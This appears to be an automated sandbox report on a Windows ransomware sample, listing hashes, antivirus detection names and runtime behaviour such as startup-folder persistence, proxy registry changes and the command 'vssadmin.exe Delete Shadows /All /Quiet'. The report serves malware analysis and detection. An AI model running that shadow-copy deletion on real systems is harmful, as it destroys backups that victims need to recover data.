Analysis Date: 2015-10-11 12:25:24
MD5: 859da4c7f04d296bd1af6fc301170e51
SHA1: 52ebf387bff9fc2f093949933638d3608c9686b2

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: b38bddafa9117b461de446d091bc89d9  sha1: a310b9ab4ac10d5e89770a37ae0d9b3e569f54f5  size: 37888
Section .rdata  md5: 4fa2f3bdd4a44021ee31115301909391  sha1: 2c0dea60589abbe4b6e4df8d02af0ae4590553a3  size: 9216
Section .data   md5: 59eb389e1d09d8da664dc4642ba2a769  sha1: c5f3df481305ccb2e19b48d68abf5a91767bc4ec  size: 4096
Section .sery   md5: f22ce7de8d17e52964e1e36c72476724  sha1: 49076e019acf5284ba22b7c53fd117989c8ca332  size: 91648
Section .rsrc   md5: 26957eef15928a163ab3ccebe4ba9279  sha1: edcdd69da9ad6cc62edda6826e25c65efe5feb20  size: 1024
Section .reloc  md5: 3be83c530b8fdd533e5ee992bcdc8057  sha1: 9145c57e982b6a946aa5aa2e0f09f15ef49b6a64  size: 4096
Timestamp: 2015-09-18 01:30:20
Version: CompanyName: eryuyjgfzsetru
Packer: Microsoft Visual C++ ?.?
PEhash: 0bd5069a51fef638b507da1074f16bb0099630b0
IMPhash: 4377aaa6a401474e8270aef3a4b4071f
AV Arcabit (arcavir): Trojan.GenericKD.2734312
AV Padvish: no_virus
AV Dr. Web: Trojan.DownLoader16.31462
AV Ikarus: Trojan.Win32.Tobfy
AV Microsoft Security Essentials: Ransom:Win32/Crowti
AV Zillya!: Trojan.Cryptodef.Win32.1464
AV MalwareBytes: Trojan.Crypt
AV Trend Micro: Ransom_.0A217DD0
AV Authentium: W32/Trojan.OPXS-1097
AV Fortinet: W32/Cryptodef.DI!tr
AV Eset (nod32): Win32/Kryptik.DXJF
AV Mcafee: Gamarue-FCX!859DA4C7F04D
AV Avira (antivir): TR/Crypt.Xpack.279424
AV Grisoft (avg): Crypt4.CKBV
AV CAT (quickheal): no_virus
AV Rising: no_virus
AV Alwil (avast): Trojan-gen:Win32:Trojan-gen
AV VirusBlokAda (vba32): no_virus
AV Twister: Trojan.Girtk.DXJF.bmlz
AV F-Secure: Trojan.GenericKD.2734312
AV BullGuard: Trojan.GenericKD.2734312
AV Emsisoft: Trojan.GenericKD.2734312
AV BitDefender: Trojan.GenericKD.2734312
AV Symantec: no_virus
AV ClamAV: no_virus
AV Frisk (f-prot): no_virus
AV Ad-Aware: Trojan.GenericKD.2734312
AV MicroWorld (escan): Trojan.GenericKD.2734312
AV Kaspersky: Trojan-Ransom.Win32.Cryptodef.ywe
AV CA (E-Trust Ino): no_virus
AV K7: Trojan ( 004cfc371 )

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates File: C:\6ff06165\6ff06165.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process: vssadmin.exe Delete Shadows /All /Quiet
Creates Process: -k netsvcs

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:
